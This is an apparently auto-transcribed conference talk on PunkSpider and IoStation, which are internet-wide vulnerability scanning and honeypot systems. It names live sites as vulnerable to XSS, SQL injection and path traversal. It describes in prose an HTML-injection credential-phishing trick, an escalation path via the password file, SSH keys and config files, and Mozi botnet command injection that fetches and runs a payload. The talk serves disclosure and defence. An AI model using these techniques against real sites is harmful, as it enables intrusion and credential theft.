 Hello, everyone, and welcome to Punksbider and IoStation, making a mess all over the internet. I am Jason Hopper, and I'm the Director of Research at Complex, and I'm here with. I'm Alejandro Ceres, I'm the Director of Computing Network Exploitation at Complex. Years ago, Alex invented or developed a system called Punksbider, and I developed something called IoStation. They're both pretty cool tools, and we've been dusting them off lately and starting to find some really good ways that we can work together, and this talk is just about how they started, how they're going and where they're going to be soon. Yeah. So, start off with a little history lesson on what the fuck is a Punksbider, right? So, Punksbider was a distributed mass web application fuzzing project run over a Hadoop cluster and stored in a distributed backend. Don't worry if you didn't fully understand that, we'll be going through what the fuck that means, in a few later slides. It was based on some older technology. You vaguely might remember it as that showdown thing with some SQL injection or some other vulnerabilities about like websites or some shit. That's usually how people remember it. So, if you remember something like that, that was Punksbider. It was presented at Shmucon 2013 and also had the site guest appearance at DEF CON 2014 as well. So, still a long time ago during this old release, everything was MapReduce, right? If you remember that time of where big technology was a big buzzword instead of fucking like blockchain or whatever, then you remember times of big data, right? And the real game changer there was that we could now crunch data in a distributed manner that was not incredibly difficult, right? So, MapReduce was not the most absolutely efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well-documented ones. Like you can follow simple tutorials and get a pretty decent cluster up and running. So, it was actually really cool. And everything back then was MapReduce. So, now I'm gonna show you my sick UI skills coming up. Nobody get intimidated, you know? This is the old Punksbider as you can see there is a lot of, you know, just text. But the main thing I wanted to show you is you would type in a URL. You could also make that a kind of like wildcard URL, right? So like darknet.star, for example. By the way, don't actually go to the site. It used to be a stamp site, might have been taken down, whatever, just don't go. And for those of you that already have, you know, sorry. But what do you see, right? So, you see that what's returned, which is at the bottom bit there is last day scan. Of course, we wanna keep our records updated. And a number of web application vulnerabilities that we're fuzzing and scanning for. So, obviously this is blind SQL injection, SQL injection, cross-site scripting, path reversal, blah, blah, blah, other very serious vulnerabilities in websites, right? So, what a lot of people do is in a very, in just an extremely open passion, we had an open API, open UI, and everything is, you could search any websites that you wanted and get either aggregate statistics on the vulnerability state of, for example, if you were to do like star.edu, or just kind of do your own research, do your own vulnerability research. I believe by the time this project sort of was shelved for a little bit, we had something like 3.4 million vulnerabilities or something like that. So, it was pretty cool. So, now we're out with the old, right? That was old shit. Old technology, great technology, good stuff that inspired a lot of the technology that's today, but it was still old, right? So, now we're back. We're full on developing. And the biggest change to the project is that appearing gray was bought by a company called Complex. And Complex has been really amazing about giving us the time, resources, money, backing, legitimacy, everything possible for us to succeed in this project. Meaning that really, this thing is flying right now. And I'll get into some of the numbers and we'll get into some of the specifics of what we're checking for in Punk Spider right now. But this thing is really flying. It's got dedicated engineering time. It's not going back down, but that way. And it's only gonna get better and better. But anyway, that's enough about Punk Spider. Hopper here is gonna give you some bit of backstory about IO Station. Yeah, so, IO Station used to be called AmiSense. I apologize if I accidentally say that in a sentence later. But, Sysadmins have similarly never liked this program or the system either. It started pretty innocently and, sorry, what it is is just a giant collection of tools that generate and aggregate data and make that available to a user. And it really did start out quite innocently. I was just coming into the cybersecurity space and I started learning about just how crazy the DNS system is, like what you can do with it, the way that it's exploited. And it's such a seemingly simple system, but I couldn't believe the depth. And I was learning about DNS amplification attacks and decided, because the way that I learned things best is by recreating the wheel, that I would just write a DNS server from scratch and I turned it into an amplification sinkhole and then started just getting really interested in that. So, I was writing a blog post and I wanted to say, there are this many open recursive DNS servers on the internet. A recursive DNS server, of course, being one that will answer a query for any domain, it'll go out and find the answer up the tree. And so, I couldn't find that answer, how many there were on the internet. So, I started writing a little Python script to do the scan to find them. And then, I realized that although that sounds simple and conceptually it's simple, there really is a lot of subtleties to actually being able to do even a simple scan at scale. And then, it's some giant deep rabbit hole and before I knew it, I had this big system. It's made up of many different parts, but the primary parts are port scanning. It's scanning over 25 ports. There's a lot of custom extractions that it's doing in addition to the obvious stuff like banner grabbing and service detection and things like that. On the dark web, we're again doing port scanning. We're trying to tease out any information on additional onion sites that might be hosted on the same VM or definitely any way that we can link it to a surface IP address or domain or something like that to do any attribution for sites that should be taken down from law enforcement. We're also, of course, crawling all these websites as well. So, we're doing dark web mentions for corporate entities and names of other things of interest. And coming from the pure cybersecurity space when we joined Complex, Complex is a cybersecurity company, but they really focus in assessing risk and transforming risk. And so, there's a bit of a mind shift that had to happen on my part where some things that are really good for pure cybersecurity actually don't inform risk that well. And there are a lot of other tools that you can use in its place. So, I've sort of been working on this system, but with that very much in mind. So, a lot of the new kind of directions that I'm, or the new tooling or the new things that I'm interested in really are kind of going down that namespace. And that could be simple things or seemingly simple things, like even just identifying what a corporation has, like what are their assets, where are they? Some corporations honestly can't even answer that question for you. And so, doing this in a kind of broad autonomous fashion is really interesting. How that informs other sort of risk metrics and then looking at kind of proxy measures like what jobs are they hiring, what technologies do they have in those job ads? Like, how does that potentially inform, you know, what they're doing in the house? We also have some passive sensors, I'll call them. You know, we're monitoring the global certificate transparency log. So, pretty well any SSL certificate that's generated, we get, we record a copy of in near real time. And then we also have another significant component, which is our listening network. So, they're basically these low interaction honey pots that have distributed globally and all across the IPv4 spectrum. And they're out there sort of just, you know, listening. They then can identify the early onset of any sort of broad malicious activity or benign activity for that matter. And we can use that as a way to profile the threat in like a sock log, for example. You know, socks have a lot to deal with. They don't need to be chasing down leads that end up just being like Google crawlers or the university of, you know, whatever doing research. Similarly, we can use this to inform a risk score by looking at for any given corporation if we know what their assets are. Have any of them been involved in, say, being part of a botnet? And if so, for how long? Like, you know, getting popped, you know, once last year is one thing, getting popped and then remaining part of a botnet or whatever for six months is kind of something else that sort of speaks to their detection and remediation policies. Of course, I still have the amplification attack sinkhole. It's not the most particularly valuable sensor, but you know, it's an oldie and a goodie. And then, you know, honestly, I started learning that if you just start registering with places and looking under some rocks, there's some really good data that you can get for free. I mean, Erin and who is, sorry, Erin and Ianna, can provide lots of data. So I collect who is data on IP addresses, which gives you ASN information, organization details and point of contacts. I do get domain who is, but that's such a low value signal. It's almost not worth mentioning. One of the ways that Alex and I are collaborating right now actually is on doing some malware analysis that we capture in our network. So that would be just doing fingerprints, looking for what sort of network behavior might be going on and trying to integrate that with some of the other tools to get a more broad picture of what's really going on in the internet. And then I also record all information from the DNS root zone files for like a thousand top level domains, basically anything that's not a country code. And that can be really interesting just to identify suspicious domains as they pop up. They might be used as like a C2 server or phishing or something like that. But then it also can be used in actually identifying assets of a company. The other thing I forgot to mention is, in terms of proxy metrics for the corporations, you can also do things like look at their SEC filings and try to evaluate for a company of this size in this industry, is their funding and cybersecurity sufficient? And lastly, no cybersecurity tool is complete if you're not pulling in some GUIP data. So this has been a big undertaking for a lot of years. And so to, I started off small, but I needed to rent some servers and things. And I figured I was more interested in spending money on something that I can hold in my hand and have forever for a long time. So instead of buying a lot of cloud services, I actually convinced my wife to allow me to build a small data center in the basement when we were redoing the basement anyway. And so the middle picture here is sort of the first version of that where I've got a whole bunch of old desktops and I bought a few used Dell R710s which bang for your buck are awesome little machines. They can really, they're real little workhorses. And I had to become an internet service provider which meant registering with the government and applying for a license. I've got a BITS license, which is basic internet telecom service license, which means I can actually sell internet to my neighbors, which is funny, although there's not really much good reason to do so. It's not exactly cost effective. But I have used some cloud services. So I've done a lot of scanning for years using Linout and Linout's always been really, really supportive. They have asked me to abide by a number of very reasonable guidelines. And otherwise they provide me a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome. So if by chance, anyone from Linout is out there or the trust and safety team in particular who I feel like I'm on a first name basis with, thank you very much. And one thing I'd like to say about this is that I had the lovely opportunity of seeing this project from kind of beginning to end. Not like there, I don't live with Jason and his wife, but I got to hear about like, hey, I'm thinking of building a data center all the way to that middle picture, which by the way, just to point out, Jason is a woodworker, metalworker, astronomer, blah, blah, blah. He does fucking everything and he's good at it too. So he built his own little server rack right there. And you saw that once he surpassed that, he bought a big fucking server rack. So that's just fucking Jason. He's crazy. That's true. I just want to point out how insane it is that, he literally built an internet service provider in his basement. And he's like, yeah, no big deal. Just a Saturday. So anything, that's all. No, it's true. I was quite proud of that little server rack. You know, I used pocket holes and everything, you know? It was fun. But Alex, we've been talking a big game here, man. What do you say we put our websites where our mouth is? I don't know, that's a terrible joke. Sure, no, I like it. Let's put our websites where our mouth is. All right, so little preface on this one. So we do have user interface that has been revamped since the one that Alex has shown. However, it is not released yet. We are releasing AUI in the fall of this year. This is just our sort of internal alpha use version only. Functionally, I'm sure it bears some semblance to what we will just end up releasing, but the one in the fall is gonna be much, much nicer than this even. So, you know, this is PunkSpider. No good search engine is complete without a giant search bar. So up at the top here, I'm gonna just, I'm just gonna pick like a random domain, something that, I don't know, might or may not be a little bit popular and do a little search. And you can see that this kind of tumblr.com website had no vulnerabilities, but, you know, there actually is this one called kickstarter.com, which just so happens to have, I see here, a cross site scripting vulnerability. So we display that, we show the parameter that we're using to abuse this, and then we've got these handy dandy buttons which you can click to test the vulnerability, which will actually open up this webpage with this payload and show you that it actually is working. And then you can also copy a curl command, which is kind of handy if you wanna, you know, change the text or do whatever. We also have this like fairly complex way of scoring these websites. So our thinking is that any one of the vulnerabilities that we're testing for are just insane to have on a website modern times, you know. There's no excuse for it, which means that if you have even one cross site scripting vulnerability, your security posture basically is a giant dumpster fire. So we I think very appropriately rank these websites on the scale of one to five dumpster fires. And that's what this, you can kind of see it is here. So another kind of cool thing is a way that we've already started to kind of work together between the two projects is port scan data. So, you know, this is kind of an easy lift, all things considered, but you can click on ports and see that, you know, this one, for example, is running a, looks like a mail server and an open SSH server. And so we're starting to kind of bring this data sets together and start answering some communal questions. But at the end of the day, what we want this to be is just a giant database that users can search. You can look at your own domains. You can check the domains that you visit or frequent. We want this to be a really awesome security tool for the masses. And there are a few limits that we've had to walk a fine line on. Of course, we don't want people coming here to just like rip off the database and go do whatever. But we'll kind of circle back to that. But yeah, did you have anything to add, Alex? No, no, that was an excellent overview of our user interface. You'll see the little country codes, of course, which, as Jason mentioned, are essential to any security tool. Absolutely. So, you know, Alex, it's funny, before this talk, I was actually on this website called archive.org, which I know is really, really popular. And this new browser extension I've got has this like, this eight on it. And it's trying to tell me something. Do you know anything about that? I don't. You don't? I'm just kidding. I'm sorry. Thanks for the lead, everybody. Yeah, so what we really wanted to do here is once better has a few goals. And we're going to talk about them a little bit later. But one really big goal that we have is that we want to engage not only with the security community. I know we're speaking at DEF CON and you're probably with the security community. But I think it's really important that we release our stuff out there so that it's ingestible by normal humans, right? So if you look at the browser plugin, it's really simple. You may have already guessed this. There are several vulnerabilities on archive.org. It has one dumpster fire rating, which I believe is appropriate for the number of vulnerabilities found and types of vulnerabilities found. And probably the most important part of this plugin, frankly, is just that big red spider, right? So that red button just tells you, hey, this website is dangerous. So anybody that knows something about web security doesn't know anything about web security, et cetera, whatever, anybody can really use this. One other really cool feature of this plugin is the trip report. So at the very bottom right of the plugin, you can see it says trip report. And if you click on that, we've only gone to some sites with cross-site scripting right now. So the results are kind of obvious in terms of what they do. But all we're doing is we're taking basic types of extremely serious web application vulnerabilities and giving you a rolled up kind of view into the last, in my last browsing session, how many websites did I visit that were vulnerable, right? So that's something that you might wanna know. You might wanna say like, oh, shit, okay. I've been browsing for a week and I have like 1% vulnerable. I wanna go back and see who that was and determine if I wanna give them more information, right? Like extremely important for you to know that. So that's what we wanted to do with this browser extension. It's also got this little like reset button that you can press that resets your stats. And one particularly important thing, Jason, if you can just go to like any random website, I know like Google is a pretty good one. And open up the extension for me. Yeah. You can see that it's grayed out, right? But it has a, that means that Punkspider doesn't currently have any data on it. Or is it, I'm sorry, Jason. Yeah, I went to Google so it's been scanned. Yeah, I know it's green, it's been scanned. Oh, fuck me, it's green, okay. So Google has been scanned. So it's gonna tell you if you're clean as well. Another state of this particular plugin is gray, which means that we haven't scanned it. If it is gray, then you have the option to submit it for a scan. The scan is really, really, really fast. Like I've never seen it take more than like three or four minutes. So that's currently the plugin. I wanted to show that with a major website like archive.org because most of you have probably heard of it and it's a very off-games website. But we can move on to the next one. Yeah, so just to illustrate the vulnerability here, I'll hit reset and you can see it executing the payload, printing out the message that we've programmed. Yeah, which is totally elite. Yeah, totally elite. All right, cool. Let's move on to the next one. Lending tree, all right, go for it. All right, but these fucking lending tree people. Okay, so lending tree, right? What can I say about them? Okay, I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in your website. And I did not receive an answer. I can give you a whole rant on my views on fucking responsible disclosure, but I'm gonna save it. And just say that, as you can obviously see from Jason loading the page, is that this payload is executed seven times. There's absolutely no filtering going on here. And you can also see that it's just in a basic bitch, basic ass query parameter there, right? And that payload is not very complicated. That's like the cross-site scripting payload basically with like one thing at it. So there's really no excuse. We contacted lending tree, let's see, a journalist contacted lending tree. I contacted, no, I didn't, yeah. So two people contacted lending tree. This was over a month ago and we still have received absolutely no response. That to me is just egregious. We are not checking for really super complex second order blind sequel injection to get a fucking out of ban shell. We're giving really basic bitch parameter injection here and just getting it right back. So any simple website scanner whether it be open source, paid, whatever should really be able to catch this. Hell, you should be able to catch this shit manually if you're building this website. So it's really a kind of inexcusable one. And because it's a popular website, I felt like I'd go ahead and call them out. Also, well, yeah, I won't pick on them anymore. But yeah, that's all I have to say about lending tree. It is funny too. People complain about you get a pentest team that's not all that good and all they do is run automated tools and but they're cheap or whatever. When we're talking about cross-site scripting and a lot of these vulnerabilities, those would still expose these problems. So these companies are not even doing that. Yeah. Yeah. I mean, if you include even including like time of like an engineer, that's like 10 minutes. You know, it's not a significant cost either. Anyway, moving on. All right. We got to move through the next ones, I think a little bit faster here, but that's okay. This is a good one. All right, not a problem, bud. This is tophas.io. It is a manga website, not about delicious, delicious tapas, but that's okay, right? So as you might have guessed here, if you click on the plugin or were to check PompSpider or whatever, you can see that it's red. It has a vulnerability in it. It's a cross-site scripting vulnerability. I know that you didn't see an alert box pop up, but let's go through this website real quick and we'll see what it has to say, right? So pretty basic login page, username, password, login, remember me, et cetera. Okay, that's fine, right? So Jason, if you could just scroll all the way down the page for me please. Oh, holy cow. There's like this whole other login form almost completely covered by the footer. What's that? Yeah. So this is the real login form for the webpage. Thanks for the lead in, bud. But this is the real login page for the website, right? So what all I've done is, because most cross-site scripting also has HTML injection vulnerability in it, we just pushed it down with a bunch of BR tags, right? So like line drape tags. I pushed the real login all the way down and created a fake login up at the top. So what does that allow me to do? That means that I can grab that link that's in the little bar right there, send it to everybody that I know to use his topos.io, whether that be from a Twitter search, a LinkedIn search, whatever search, and it's something that they inherently trust, right? So now I can just sit back there, harvest user names and passwords. I know there's still like some cross-origin restrictions that we need to kind of get around. This isn't a web app hack and talk, so I won't go through those, but this is very easy to just start stealing user names and passwords is my point. And that sucks. So to anybody in the system, it's like the cross-site scripting is not that serious. You're wrong. This is why they're wrong. Yeah, so our tests aren't looking just for cross-site scripting, although there are many of those. We're also doing SQL injection, as Alex has said before. So this is an example of this. So primeinvestor.in, presumably something to do with finances. They've got a login page. They might have pretty sensitive information behind this. And they're not sanitizing their inputs. So we were able to have the web server execute an SQL query just by putting it into like a text form or something like that. It's also kind of interesting that it can also, even the error can give you back more information. Like this is clearly a WordPress site, but this is crazy. I mean, all they're doing is not sanitizing their input. I mean, most frameworks nowadays won't let you avoid it. I mean, this has got to be like, you almost have to go over your way to have this still be a problem. And it's a huge problem because this is being executed with the same permissions as the web server itself. And so the web server must have read-write permissions on all the tables related to users and things like that. A website that has this kind of problem, it wouldn't surprise me in the bit, in the slightest, if they had plain text passwords being stored in the database. So potentially they could just dump this whole thing. At very least, they're probably not salting them or whatever. And you could just, you know, unhash them or something. But this is a massive problem, really. I mean, this is, yeah. I think you have, do you have more to say on that, Alex? I do, you know, we think of sites like this, like primeinvestor.in as not a huge deal, right? I mean, whatever, you found some SQL injection, good job, right? The problem with that is that we can no longer rely on that argument, right? So we are in the age of data breaches. We're to a point where data breaches are so prevalent that, you know, you have tens of trillions of records sometimes in leak aggregators, meaning that every breach, whether it affects you directly or whether it's a website that you actually care or whether the username and password that you use on that website was sensitive or not, like it can still affect you, right? So websites that have nothing to do with you are now seriously affecting the security of corporations and people in general, right? So like I said, we're in the age of the data breach. And stuff like this is really inexcusable. To give you an idea, all of the websites that we're showing are in Alexa's top 5,000. Like you may not have heard of some of these websites, but they are the top websites on the internet. So to have something like this is really just irresponsible, quite frankly. It's completely irresponsible and it's causing major problems across the internet these days. Like even the fucking colonial pipeline hack was a credential stuffing attack against their VPN, right? So, I mean, that can be a completely unrelated websites got breached and then a VPN got breached. Like we can't have websites like this out there that are just giving usernames and passwords. And we also know now from all these aggregators that are being built and all the password research that's going on, that one, people are fucking terrible at passwords. Like, we get secret 5.1 and that's all of a sudden a fucking secure password. But the other thing is that people reuse their passwords everywhere. So even if it's a site that you don't necessarily care about, if you reuse that password in one single place, somebody could easily find it. And that's all I have to say about that. Yeah. I think the next example is actually a pretty cool one. So this is a traversal attack, which means that we can put in the URL, the path to a different file or something that the web server should definitely not be allowed to access or certainly shouldn't be showing to a random website viewer. But we're doing this with the passwords file and Linux and what that does is it gives us a list of all the different users and groups including all the system users that this server has. And this is a massive problem because basically this means that we can view files on the server easily. So we could go through this list, find a username that we think is a person or like an actual user and then try to, for example, view their private key, their SSH private key. If we had that, then we could also take a few guesses that maybe some, if it's on a VM or it's just, you know, hosting this website even, you know, maybe it's using some common frameworks like WordPress or something. So WordPress has some default install folders. So maybe we can then go and try to look at the config file and get the database password. So now we could potentially log into the server and access the database freely or the database of another server being hosted on the same VM. I mean, this server is vulnerable, which means really it's putting all of its neighbors at risk. And it's just, again, it's just so silly, like, you know, fix the permissions. Yeah. Yeah. Lastly, this one is just sort of a bit of, you know, beating a dead horse here, but Kickstarter has a cross-site scripting vulnerability. So I just hit refresh here, you know, punk spider back. Nothing shows this off better, but Kickstarter is a bigger organization. They can afford, you know, and like one intern to just go through and check for obvious scripting vulnerabilities and stuff like that. I mean, there's really no reason for this. You give this company money. You have login credentials. You have user data. I mean, I don't even know what else they probably have on the backend, but you know, you're putting people at risk with this. Yeah. Cool. So all right, let's head back to the slides. All right. So, you know, how is this being used, Alex? Wonderful question, Jason. So I feel like we're news anchors or something, but anyway, so you're probably wondering, of course, so we're releasing a fuck ton of vulnerabilities, right? And we're just giving them out for free. So how do you access them, right? A few ways you can use this. One is the browser extension, which you've shown you. Of course, very, very useful. Please download that and use it if you like it. There's a free and open REST API. You can search by vulnerability, domain name, wildcards are all allowed. You have even character wildcards and things like that. So full wildcard search, there's no limitations there. There's a CLI tool that you can use as well, built by a long form Mr. Hopper over here. So you can get stuff like that as well. Soon to come, search engine interface, already in alpha. Jason already showed you some of that. You can search by vulnerability, domain name, wildcards again, all in play, we don't limit any of that kind of stuff. Recount in G module, 10 tomes, you know him, wonderful man, wonderful software. Hate mail module, if you use that. Metasploit module, just because everything needs a Metasploit module and really anything that you all feel that you would like to see with this data, just choose this ideas, what we can build it or you can submit something, it's an open source, you know, thing, whatever. But let us know how we can support you to support. Yeah. Help us help you. Let us know how to help you basically and we will help you out. Moving on from there, how do we do this, right? We have this question, a good amount. How do you scan that many websites? Do you have to create your own scanner? Do you have your own fucking internet service provider, et cetera, et cetera. The real answer is it's just a fucking ton of work and a lot of benchmarking, right? The original punch spider was built on old technology so there's a bunch of benchmarking I had to do in terms of what's important. What's important here? Computing power, memory, bandwidth, all kinds of different things. So there was all kinds of tests that we needed to run to make sure that everything was running like as smoothly and as quickly as possible. We had some creative engineering in there, right? So we repurposed a lot of technology that's really built for, you know, search engine technology, data analytics technology, all of that stuff is being used in the back end of punch spider. It's just we're completely repurposing it for the purposes of offensive security. Last thing that we did is we embraced the cloud, right? Ride the snake meaning we're addicted. We're all of a sudden addicted to heroin. I mean, AWS. Same thing. What's that? Same thing. Same thing, yeah, very similar things to be addicted to both in costs of thousands of dollars a month. AWS is probably more dangerous, but we really embraced it and we just realized like, you know, the world is kind of moving in that direction and so we may as well take advantage of that, right? So next slide, please, sir. All right, all I want to show you is that we do have metrics and monitoring on the back end of the system. Like I said, it is a very well-funded, well-engineered system at this point. All I'm showing you here at the top left, you'll see the word ferret. Ferret is our custom built scanner. And all I really wanted to show you here is that there's a bunch of different scan nodes and each of those scan nodes is handling thousands of different websites. So this will get reshuffled and things like that as more data either comes in or this cluster is scaled more, which to me it looks like it needs to be scaled a little bit more, but it's a good view into the fact that we are doing truly, truly mass distributed scanning. So we could move on to the next slide. Yeah, so actually you could skip this slide. Okay. All right, thanks, sir. So how does this work, right? I want to give you a basic architecture of punk spider. We have a Kafka queue. Kafka is a simple queuing system. So something comes in and something comes out to a system that's ingesting that, right? The reason that we need a queuing system in order to do this is that we are submitting so many URLs that we need a piece of technology that is distributed and allows us to handle the level of data that we're talking about because we're submitting about, we're submitting something like tens of billions of domains, which means hundreds of billions, if not trillions of actual web pages. So queuing technology is really important here and it's used very much throughout punk spider. Next slide, please, sir. The ferrets. The ferrets, right. So because that Kafka queue, again, distributed just gives you a website. We need something to then scan that website. As I mentioned that application is called ferret, right? So that's our web app puzzle works really quickly, works in a distributed manner, that kind of Kubernetes auto scaling. So we need a lot of ferrets to really be able to scan all of these websites and get all of the data that we want and then present that back to you which is shown in the next slide. And you see that we index these results into two different things. One is RDS for stats. And the other thing is cloud search to obviously build the search engine for everybody. So all of this is kind of a simplified view into the entire thing. This feeds back into the queuing system, actually. And yeah, this does back into the queuing system and can even create more URLs for us to scan and things like that. So that's basically how it works on the backend. What I really wanted to point out is that everything is fucking distributed. Everything is distributed. That's why I have pictures of lots of ferrets, pictures of lots of copcats, pictures of lots of results, right? Everything is distributed. So we can scale sky's the limit. Cool, and you can grab more shit from IO station which Jason's gonna tell you about. Yeah, so running a data center has been a lot of work. It's interesting. It's one of those things where you have to decide where you wanna put your time and effort. I've built this system on Postgres which is awesome. There's a really specific reason I'll use something else but I use Postgres a lot. RabbitMQ I used for years. However, I've got, I had an issue where it would just disconnect consumers all the time. So all the sensors would be passing messages to it and then the consumers would get disconnected and then the queues would get so big that they would stop delivering messages which makes no sense and then even worse they'd continue to get big and eventually explode the nodes. So I eventually replaced it with Kafka which isn't perfect but I've definitely had much better results overall and the rest of it is kind of bash and Python because I've been developing this myself to this point and so kind of simplicity is key. We're moving as much complexity as you can in a lot of ways will make your life a little easier when it's just a one person operation that is. So Alex showed his UI so I thought it tossed mine up here too. It's pretty simple. You type in an IP address, search it, it shows on the map where it's resolving. We've got GeoIP and who is data and then for the port scan data it shows each port in a different card and I think I mentioned before it's scanning over 25 ports. There's a lot of custom extractions that are going on in this and then of course the normal stuff like service identification and banners and stuff like that and it's too much to show in one screenshot but below is where all the listening service data is and then there's SSL search and things like that. This website has never been public nor probably will it ever be but you know can't let someone show the world UI alone. It's so inappropriate. So just a really quick little case study I guess of something that has been coming across IO station. So there's this thing called the Mozzie botnet back in 2019 I started observing it. It's known to other people it's a really big botnet right now and basically it's try and command injection and servers. So these are the two URLs that I see most of the time and you can see one of them is next file equals netgear.cfg and then it pulls, we'll get pulls this thing from an IP and port Mozzie.m is the file name and then it runs it and then similarly the other one does the same thing but Mozzie.a and it executes it slightly differently but basically this looks like it's trying to do this on netgear equipment at a minimum and we know from punk spider that there are tons of websites that are vulnerable to injection like this. So I started digging a little bit deeper and I used this data to identify where the attacks were coming from and where the malware was being hosted and interestingly they were always different IP addresses whatever service or sorry whatever computer was saying go download and run this malware was never the same IP address as where it was being hosted and they were mainly hosted in China like predominantly definitely some in India and of course it's a botnet so it's spread across the world but there was a huge amount of it coming from China which was interesting because then when I looked at what sensors the botnet was hitting mostly it was really heavily hitting India, Japan, Australia and then to a slightly lesser degree Canada and Germany but there were no hits in China which was kind of funny and I'm not trying to suggest that this is some sort of like clever state sponsored piece of malware or anything like that I just thought it was funny that none of my Chinese servers actually saw any of this and it almost looks like kind of a geopolitical map a little bit so yeah, China's suspiciously missing there you know, I did dig in to look at what devices were actually being part of this botnet and it definitely looked a lot of D-Link, Nekir and Huawei gear I saw IP cameras, DVRs, there were some G-Pond devices which was a little interesting I didn't really see anything that indicated it was part of any sort of like corporate structure or anything but the software being used are a lot of web servers but they're all the like kind of small lightweight ones that you see being used in sort of embedded devices and things like that like home routers and I did notice that the light PD version that I saw a lot of actually 1.4.39 had just a ton of CVEs and many of them were just like blanket remote code execution, vulnerability and stuff which was kind of cool so I did kind of poke around at a few of these seeing like what they were showing and I found this kind of cool example this was just somebody part of the botnet it has an interface that looks a lot like D-Link I didn't try to log in or anything like that the links on the top made you log in but I did dig around the JavaScript because it really wasn't that much actually and I saw that it was crafting these links so I went to a few of them directly like sys-status.asp for example and you know I guess it doesn't always want you to log in so if you go to them directly the login page actually works or sorry is bypassed and I was able to see all the internal DHB tables and all the routing information and all that stuff and you know while this isn't some egregious vulnerability necessarily on its own right it's just kind of illustrating like this is the kind of nonsense that is still all over the internet like I know security's been a hot topic it's getting better I think I think anyway but there's still craziness like this where this person's router just like lets you log in and yeah that's kind of crazy to me so you know we're kind of running out of time here but I'm sure the burning question in everyone's mind is where is this all going so where is it going Alex? Right so I just want to recap for everybody right so a couple of quick things created a hugely scalable system for buzzing a 5% of URLs we found a bunch of vulnerabilities in major websites we've even found zero days in popular form technology right so obviously the probably most important part of that is that we're releasing it out to you all the public and we want to keep these results updated while still continuing to go extremely broad our target is still the entire internet it is we're not going to let down on that target we're going to continue engineering until we've reached that target and we can keep the records reasonably updated to a certain degree right so how can you kind of help us right so I mentioned throwing us ideas obviously it's really helpful but download that extension use that CLI tool start calling out websites all of these things are really helpful and not only the punk spider but part of the mission of punk spider really we built this for you all so don't forget to use it basically this is all as far as IO station is concerned you know I think that continuing to transform my mindset from pure cyber security to evaluating risk and risk scoring is really interesting so I want to continue kind of going down that path that's not to say that there won't still be the broad internet collection tools that have been working with and know and love but it's just that some of the newer features that are coming out probably will be geared towards that especially when it comes to critical infrastructure and industrial control systems which for anyone paying attention to the news lately I'm sure knows has been a bit of a hot button topic when it comes to certain pipelines which may not be named but I think that's a really fascinating area and especially one that's obviously increasing importance I know there's a lot of utilities and things that have really ignored their cyber security posture and they're starting to get bit by it and anyways that's something I think we need to look at and the other one is a little bit more vague but really trying to identify attacker infrastructure like are there things that we can be observing from the outside to identify what an attacker is using and how they're organizing but maybe early or on the onset or whatever as early as possible obviously is better are there is there software that can be probed and identified running across the internet are there any sort of particular techniques or patterns or signatures or anything like that that we can extract this one is not as well thought out obviously it's just something that I think we're pretty interested in tracking down long term but I think that about wraps it up for us so yeah if you wanna shoot us an email or whatever feel free you can visit our office but Alex and I won't be there so Yeah, thanks everybody for coming and listening to our talk we really appreciate it and thank you all for taking the time to listen to us ramble on about this system and I hope you really enjoyed it. Yeah, thanks everyone, take it easy. Peace everybody, later.